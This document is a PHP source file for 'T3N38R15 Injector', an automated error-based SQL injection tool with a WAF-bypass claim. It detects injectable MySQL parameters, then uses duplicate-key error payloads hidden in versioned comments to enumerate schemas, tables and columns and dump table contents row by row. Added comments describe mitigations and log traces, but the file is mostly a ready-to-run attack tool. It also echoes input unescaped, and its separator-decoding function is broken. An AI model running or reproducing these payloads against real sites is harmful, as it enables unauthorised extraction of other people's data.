Aerosol

Auto Sqli [Error-based] + WAF Bypass


<?php
// T3N38R15 error-based injector: one self-posting page that walks a target in
// four stages (opt1..opt4), each selected by a hidden form field. Every stage
// appends a payload to the operator-supplied "url", fetches it with LoadSite()
// and parses the target's verbatim MySQL error text out of the HTTP body, so
// the whole technique only works against applications that echo database
// driver errors to the client. Target-side mitigation is therefore twofold:
// parameterised queries, and never surfacing driver error messages.
// Note for anyone reading the tool's own output: fetched strings and the
// submitted URL are written into this page's HTML without escaping.
@set_time_limit(0);
// empty() returns a bool, so "==0" means "a form was submitted".
if(empty($_POST)==0){
if(empty($_POST["opt1"])==0){
// Stage 1 (opt1): detection. Each of three suffixes is appended to the URL and
// the response is searched for MySQL's syntax-error message.
$Fd=false;
$pb=array('1"','1' . chr(39),'1');
$_url = $_POST["url"];
foreach($pb as $zz){
$_buffer = LoadSite($_url . $zz, "");
if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;}
}
if($Fd){
// Find the suffix under which the GROUP BY / floor(rand(0)*2) payload makes
// the server raise a duplicate-key error; "Duplicate entry" in the response
// is the success marker every later stage keys on.
$seperator='';
foreach($pb as $zz){
$fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+';
$_buffer=LoadSite($fg,"");
if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;}
}
if($seperator==''){echo "NOTHING UP HERE";exit();}
echo '<table><tr><td valign="top">';
// Banner: version(), user() and database() come back "~"-separated inside the
// error text. The text after "Duplicate entry" is split on "~"; there is no
// guard, so $lde[1] is undefined (and these reads warn) if the marker is
// absent from the response.
$fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2];
echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database;
// Schema count via information_schema. The MySQL versioned comments
// (/*!50000 ... */, /*!information_schema.... */) are presumably the "WAF
// bypass" of the title: a filter that does not strip or normalise MySQL
// comment syntax never sees the keywords inside them, while the server
// executes them. Detection-side takeaway: normalise comments before matching.
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$dbcount=$_buffer1[1];
echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>';
// One request and one hidden form per schema (LIMIT i,1). The schema name is
// hex-encoded with String2Hex() so the next stage can splice it in as a 0x
// literal; the form posts back to this same page with opt2 set.
for ($i=0;$i<$dbcount; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt2" value="1">';
echo '<input type="hidden" name="seperator" value="';
// The working suffix travels to later stages as a code 1/2/3 in the hidden
// "seperator" field (GetSeperatorByInteger is the intended inverse).
switch($seperator){
case '1"':echo "1";break;
case '1' . chr(39):echo "2";break;
case '1':echo "3";break;
}
echo '"></form></td></tr>';
}
echo "</table><td></tr></table>";
}
}elseif(empty($_POST["opt2"])==0){
// Stage 2 (opt2): list tables of the chosen schema, same duplicate-key
// technique. "nameinbase" is the hex-encoded schema name from stage 1.
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>';
// One request per table name; each row is a form that posts opt3 with the
// table name hex-encoded in "nameinbase2".
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt3" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
}elseif(empty($_POST["opt3"])==0){
// Stage 3 (opt3): list columns of the chosen table ("nameinbase2") in the
// chosen schema ("nameinbase"); each row posts opt4 with the column name
// hex-encoded in "nameinbase3".
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . ' (Total: '.$cta.')</td></tr>';
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode("~",$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">';
echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt4" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
echo '</table>';
}elseif(empty($_POST["opt4"])==0){
// Stage 4 (opt4): read one column of one table row by row, one request per
// row (LIMIT i,1). Here the hex fields are decoded back to identifiers with
// Hex2String() and spliced into the query text directly. This is the stage
// that produces the bulk of the request volume a target's logs would show.
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>';
for ($i=0;$i<$cta; $i++){
$fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>';
}
echo '</table';
}
}else{
// No POST yet: render the launch form (opt1 is the hidden stage selector).
?>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
<html>
<head><title>T3N38R15 Injector for WAF Bypass</title></head>
<body>
<b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b>
<form method="post">
<input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit">
<input type="hidden" name="opt1" value="1"></form>
</br>
Greets to Team M4DL33Ts
</body>
</html>
<?php
}
// Intended inverse of the 1/2/3 encoding that stage 1 writes into the hidden
// "seperator" field: code 1 -> '1"', code 2 -> "1'", code 3 -> '1'.
// Any value matching none of the cases falls through to ''.
// Note that switch() compares loosely, so "1" and 1 both hit the first case.
function GetSeperatorByInteger($int){
switch($seperator){
case '1':return '1"';
case '2':return '1' . chr(39);
case '3':return '1';
}
return '';
}
// Hex-encodes a byte string: every byte becomes dechex(ord(byte)), concatenated
// with no separator. dechex() emits a single digit for byte values below 0x10,
// so the output is not zero-padded the way bin2hex() would be; Hex2String()
// assumes two digits per byte, which holds for the printable ASCII the tool
// feeds through here.
function String2Hex($string){
    $encoded = '';
    $length = strlen($string);
    $offset = 0;
    while ($offset < $length) {
        $encoded .= dechex(ord($string[$offset]));
        $offset++;
    }
    return $encoded;
}
// Decodes a hex string two digits at a time into the corresponding bytes.
// A trailing odd digit is ignored, and an empty or single-character input
// yields ''. No validation is done: hexdec() silently skips non-hex
// characters, so malformed input produces bytes rather than an error.
function Hex2String($hex){
    $decoded = '';
    $length = strlen($hex);
    for ($pos = 0; $pos + 1 < $length; $pos += 2) {
        $pair = $hex[$pos] . $hex[$pos + 1];
        $decoded .= chr(hexdec($pair));
    }
    return $decoded;
}
// Fetches $url with cURL and returns the response body as a string, or false
// when curl_exec() fails (its result is passed through unchanged).
// What a target's logs would record per request: a fixed User-Agent claiming
// Firefox 31 on Windows NT 5.1, redirects followed, and the POST method —
// isset() is true for any non-null argument, including the "" every caller
// passes, so every request is sent as a POST (with $postdata as body) even
// though the payload itself is in the URL's query string.
function LoadSite($url, $postdata){
$agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
$ch = curl_init($url);
if ($ch){
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_USERAGENT, $agent);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
if (isset($postdata)){
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);}
$tmp = curl_exec ($ch);
curl_close ($ch);
}
// NOTE(review): $tmp is never assigned when curl_init() returns false, so
// this reads an undefined variable (null, with a warning) on that path.
return $tmp;
}
?>

Credits to : T3N38R15
